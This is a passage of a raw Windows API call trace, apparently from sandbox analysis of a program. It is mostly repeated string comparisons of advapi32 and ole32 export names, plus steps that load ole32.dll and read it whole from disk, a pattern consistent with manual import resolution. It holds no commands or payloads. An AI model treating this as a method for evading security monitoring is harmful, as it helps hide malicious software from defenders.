lpString2="A_SHAInit") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0167.961] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0167.962] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0167.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0167.963] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0167.963] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0167.963] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.964] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0167.965] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0167.965] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.966] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0167.967] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0167.968] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0167.968] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0167.968] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0167.968] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0167.968] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0167.968] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0168.507] GetProcessHeap () returned 0x580000 [0168.507] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2cf2010 | out: hHeap=0x580000) returned 1 [0168.515] GetProcessHeap () returned 0x580000 [0168.515] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x599340 [0168.516] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0168.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0168.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0168.517] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0168.518] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0168.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0168.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0168.518] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0168.518] GetProcessHeap () returned 0x580000 [0168.518] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x142d00) returned 0x40b5040 [0168.522] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0168.522] ReadFile (in: hFile=0x140, lpBuffer=0x40b5040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40b5040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0169.096] CloseHandle (hObject=0x140) returned 1 [0169.096] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0169.096] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0169.096] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0169.096] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0169.096] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 